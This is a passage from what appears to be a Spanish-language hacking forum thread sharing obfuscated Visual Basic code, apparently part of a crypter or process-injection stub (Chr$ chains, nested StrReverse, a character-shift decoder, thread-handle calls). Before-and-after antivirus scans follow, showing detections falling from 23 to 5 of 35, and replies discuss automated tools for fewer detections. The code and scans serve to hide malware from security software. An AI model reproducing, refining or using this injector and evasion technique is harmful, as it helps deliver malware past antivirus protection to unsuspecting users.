& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(4) & Chr(43) & Chr(63) & Chr(62) & Chr(34) & Chr(38) & Chr(1) & Chr(48) & Chr(53) & Chr(53) & Chr(46) & Chr(33), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread
End Sub

Public Function kMIvzyLCQ(FhbXF8MVH As String, lPCqbkM9x As Integer)
    Dim kDFZMkl0Q As Integer
   
    For kDFZMkl0Q = 1 To Len(FhbXF8MVH)
        Mid(FhbXF8MVH, kDFZMkl0Q, 1) = Chr(Asc(Mid(FhbXF8MVH, kDFZMkl0Q, 1)) - lPCqbkM9x)
    Next kDFZMkl0Q
    kMIvzyLCQ = FhbXF8MVH
End Function


Antes:

Date and Time: 10/11/2012 3:45:23 P
File Name: sPrueba1.exe
File Size: 16384 Bytes
MD5: 672d19493b2faeb7cf8cf3ea64f51890
SHA1: e149fa00bb18b624fd51d13cdc8c8d7cb58035e8
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Win32:Inject-ATA [Trj]
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.ZGY.8
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.VbCrypt.89
eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.ZGY.8
G Data - Gen:Trojan.Heur.ZGY.8, Win32:Inject-ATA [Trj]
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - W32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected Trojan.VB.Levelup
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora:

Date and Time: 10/11/2012 3:53:27 P
File Name: sPrueba4.exe
File Size: 24576 Bytes
MD5: 847f8117c78d7e42d06b3ec11f4462f5
SHA1: ee1263d4edfab9f052f148ae6a76428cfcef8969
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - TrojWare.Win32.Agent.angn@220045096
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Clean!
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - Clean!
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Clean!
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBCheMan-D
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Riskware ( ed2edfef0 )
VIPRE - Clean!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desfrutem y Saludo Bros

pero si esta randomizado con aco...
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Gracias por aportar, aun asi es lo que dice sanko... Esto bien hecho en 2 clicks se hae con ACO, y dejandolo con menos detecciones.

-Saludos-

JAJAJAJAJAJAJAJAJAJAJAJAJA!  :o